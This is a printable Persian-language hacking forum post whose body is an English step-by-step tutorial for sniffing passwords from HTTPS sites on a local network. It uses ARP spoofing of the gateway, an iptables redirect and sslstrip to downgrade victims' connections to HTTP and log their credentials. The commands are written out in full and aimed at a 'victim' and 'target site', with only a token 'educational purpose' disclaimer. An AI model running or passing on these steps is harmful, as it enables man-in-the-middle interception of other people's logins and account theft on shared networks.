Parsi Coders
انالیز و ردیابی کلمه عبور در پروتکل امنیتی SSL HTTPS - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+---- انجمن: LEARNING HACKING (http://parsicoders.com/forumdisplay.php?fid=125)
+---- موضوع: انالیز و ردیابی کلمه عبور در پروتکل امنیتی SSL HTTPS (/showthread.php?tid=3049)



انالیز و ردیابی کلمه عبور در پروتکل امنیتی SSL HTTPS - Amin_Mansouri - 02-08-2013

انالیز و ردیابی کلمه عبور در پروتکل امنیتی SSL HTTPS
 وقتی اسم HTTPS و SSL میاد ,فکر کنم بحث امنیت زیاد به ذهنتون میرسه در این مقاله  نحوه نفوذ و مانتیور کردن و همچنین زدن کلمه عبور رو یاد میگیرید.
توجه کنید نیاز به ابزار زیر دارید:
Backtrack 5 KDE  نسخه 32 بیت
Arpspoof
Sslstrip-0.9
بقیه مطالب به زبان انگلیسی میباشد که بسیار با فهم و گویا میباشد.
SSL Analysis : Sniffing passwords from HTTPS/SSL secured sites
A couple of days ago, I posted a tutorial on how to sniff passwords from your LAN, which showed us how to sniff HTTP, FTP, POP, TELNET username and passwords.
:1) First, lets enable port forwarding by typing : echo ’1′ > /proc/sys/net/ipv4/ip_forward .[عکس: 1.jpg]
 
2) Secondly, locate the Gateway IP on our LAN, to do this type : netstat -nr .[عکس: 2.jpg]
 
3) Now we have to set out iptables to redirect to port 8080, to do this type : iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 .[عکس: 7.jpg]
 
4) Start arpspoofing by typing : arpspoof -i wlan0 192.168.0.1(Replace wlan0 with your network type and replace IP address with your gateway server IP, which we obtain earlier by typing netstat -nr.[عکس: 8.jpg]
 
5) Lastly lets activate sslstrip by typing : sslstrip -l 8080 .[عکس: 9.jpg]
 
6) Set up is complete!! Ok so now as shown below, we have two terminals running. One is doing the arpspoofing while the other terminal is running sslstrip.[عکس: 12-%20sitandwait.jpg]
 
7) If you want to monitor your logs as they arrive, Open a third terminal and type : tail -f sslstrip.log .[عکس: 16-logfiletail.jpg][عکس: 17-3screens.jpg]
 
8) When users on your LAN start to log onto https sites or any site for that matter, your screen will be filled with alot of gibberish, trash looking errors and stuff. This is normal, dont worry about it. Just have a joint and wait it out [عکس: icon_smile.gif?m=1129645325g] and with some patience…………………………Voila![عکس: passwords%20recieved.jpg]
 
Objective :
What we just did is instruct the gateway server to watch HTTP traffic, look for links and redirects to HTTPS traffic, and rewrite them into HTTP.
So when our victim proceeds to http://www.hotmail.com. Instead of being presented with the secured https:// …he or she will receive http://www.hotmail.com , stripping away the ssl security.
 
Authors Note :1) For those trying it the first time,I must warn you that you will most likely see error messages appear on your terminal (Shown Below). But dont worry too much about it. It will still work. From all the research iv done over this issue, iv come to understand that it is a common issue that many are facing. Keep updated with the official site to see the bugs & fixes for sslstrip-0.9
.[عکس: 14-error.jpg]
2) If you are running a heavy process, there is a chance your network might go down for a bit. Once again, dont worry about it, it will be up and sorted pretty quickly. I dont think i need to tell you that when that happens, stop all your terminals and wait for the network to patch back up.3) To minimize the gibberish nonsense in your log, you could Google for a script call parselog.py. Its decent and clears out a lot of the gibber.4) Please take note that sslstrip doesnt not work against certain browsers like FF & Chrome and i believe gmail site as well. Do some research online regarding your target site.5) This is for educational purpose, please>DO NOT harm the innocent.
نقل قول:Our national drug is alcohol. We tend to regard the use any other drug with special horror. – William S. Burroughs
 
Contributed By
James